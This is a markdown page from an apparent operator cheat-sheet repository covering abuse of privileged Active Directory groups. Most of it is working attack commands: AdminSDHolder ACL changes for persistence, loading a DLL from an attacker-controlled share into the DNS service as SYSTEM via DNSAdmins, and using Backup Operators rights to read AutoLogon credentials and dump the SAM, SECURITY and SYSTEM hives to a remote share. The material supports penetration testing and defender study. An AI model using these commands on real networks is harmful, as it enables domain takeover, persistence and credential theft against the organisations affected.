daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-adds-groups.md (6898B)


      1 ---
      2 title: "Active Directory - Groups"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/ad-adds-groups.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adds-groups.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Active Directory - Groups
     12 
     13 ## Dangerous Built-in Groups Usage
     14 
     15 If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `adminCount` attribute to `0` for the required object.
     16 
     17 > The AdminCount attribute is set to `1` automatically when a user is assigned to any privileged group, but it is never automatically unset when the user is removed from these group(s).
     18 
     19 Find users with `AdminCount=1`.
     20 
     21 ```ps1
     22 netexec ldap 10.10.10.10 -u username -p password --admin-count
     23 # or
     24 bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 get search --filter '(admincount=1)' --attr sAMAccountName
     25 # or
     26 python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.10.10.10
     27 jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json
     28 # or
     29 Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)"
     30 Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
     31 # or
     32 ([adsisearcher]"(AdminCount=1)").findall()
     33 ```
     34 
     35 ## AdminSDHolder Attribute
     36 
     37 > The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.
     38 
     39 If you modify the permissions of **AdminSDHolder**, that permission template will be pushed out to all protected accounts automatically by `SDProp` (in an hour).
     40 
     41 E.g: if someone tries to delete this user from the Domain Admins in an hour or less, the user will be back in the group.
     42 
     43 * Windows/Linux:
     44 
     45   ```ps1
     46   bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 add genericAll 'CN=AdminSDHolder,CN=System,DC=example,DC=lab' john
     47 
     48   # Clean up after
     49   bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 remove genericAll 'CN=AdminSDHolder,CN=System,DC=example,DC=lab' john
     50   ```
     51 
     52 * Windows only:
     53 
     54   ```ps1
     55   # Add a user to the AdminSDHolder group:
     56   Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights All -Verbose
     57 
     58   # Right to reset password for toto using the account titi
     59   Add-ObjectACL -TargetSamAccountName toto -PrincipalSamAccountName titi -Rights ResetPassword
     60 
     61   # Give all rights
     62   Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName toto -Verbose -Rights All
     63   ```
     64 
     65 ## DNS Admins Group
     66 
     67 > It is possible for the members of the DNSAdmins group to load arbitrary DLL with the privileges of dns.exe (SYSTEM).
     68 
     69 :warning: Require privileges to restart the DNS service.
     70 
     71 * Enumerate members of DNSAdmins group
     72     * Windows/Linux:
     73 
     74     ```ps1
     75     bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 get object DNSAdmins --attr msds-memberTransitive
     76     ```
     77 
     78     * Windows only:
     79 
     80     ```ps1
     81     Get-NetGroupMember -GroupName "DNSAdmins"
     82     Get-ADGroupMember -Identity DNSAdmins
     83     ```
     84 
     85 * Change dll loaded by the DNS service
     86 
     87     ```ps1
     88     # with RSAT
     89     dnscmd <servername> /config /serverlevelplugindll \\attacker_IP\dll\mimilib.dll
     90     dnscmd 10.10.10.11 /config /serverlevelplugindll \\10.10.10.10\exploit\privesc.dll
     91 
     92     # with DNSServer module
     93     $dnsettings = Get-DnsServerSetting -ComputerName <servername> -Verbose -All
     94     $dnsettings.ServerLevelPluginDll = "\attacker_IP\dll\mimilib.dll"
     95     Set-DnsServerSetting -InputObject $dnsettings -ComputerName <servername> -Verbose
     96     ```
     97 
     98 * Check the previous command success
     99 
    100     ```ps1
    101     Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
    102     ```
    103 
    104 * Restart DNS
    105 
    106     ```ps1
    107     sc \\dc01 stop dns
    108     sc \\dc01 start dns
    109     ```
    110 
    111 ## Schema Admins Group
    112 
    113 > The Schema Admins group is a security group in Microsoft Active Directory that provides its members with the ability to make changes to the schema of an Active Directory forest. The schema defines the structure of the Active Directory database, including the attributes and object classes that are used to store information about users, groups, computers, and other objects in the directory.
    114 
    115 ## Backup Operators Group
    116 
    117 > Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group cannot be renamed, deleted, or moved. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers.
    118 
    119 This groups grants the following privileges :
    120 
    121 * SeBackup privileges
    122 * SeRestore privileges
    123 
    124 Get members of the group:
    125 
    126 * Windows/Linux:
    127 
    128     ```ps1
    129     bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 get object "Backup Operators" --attr msds-memberTransitive
    130     ```
    131 
    132 * Windows only:
    133 
    134     ```ps1
    135     PowerView> Get-NetGroupMember -Identity "Backup Operators" -Recurse
    136     ```
    137 
    138 Enable privileges using [giuliano108/SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege)
    139 
    140 ```ps1
    141 Import-Module .\SeBackupPrivilegeUtils.dll
    142 Import-Module .\SeBackupPrivilegeCmdLets.dll
    143 
    144 Set-SeBackupPrivilege
    145 Get-SeBackupPrivilege
    146 ```
    147 
    148 Retrieve sensitive files
    149 
    150 ```ps1
    151 Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite
    152 ```
    153 
    154 Retrieve content of AutoLogon in the `HKLM\SOFTWARE` hive
    155 
    156 ```ps1
    157 $reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', 'dc.htb.local',[Microsoft.Win32.RegistryView]::Registry64)
    158 $winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon')
    159 $winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"}
    160 ```
    161 
    162 Retrieve `SAM`,`SECURITY` and `SYSTEM` hives
    163 
    164 * [Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec)
    165 
    166     ```ps1
    167     nxc smb 10.10.10.10 -u user -p password -M backup_operator
    168     ```
    169 
    170 * [mpgn/BackupOperatorToDA](https://github.com/mpgn/BackupOperatorToDA)
    171 
    172     ```ps1
    173     .\BackupOperatorToDA.exe -t \\dc1.lab.local -u user -p pass -d domain -o \\10.10.10.10\SHARE\
    174     ```
    175 
    176 * [improsec/BackupOperatorToolkit](https://github.com/improsec/BackupOperatorToolkit)
    177 
    178     ```ps1
    179     .\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK
    180     ```
    181 
    182 ## References
    183 
    184 * [Poc’ing Beyond Domain Admin - Part 1 - cube0x0](https://cube0x0.github.io/Pocing-Beyond-DA/)
    185 * [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/)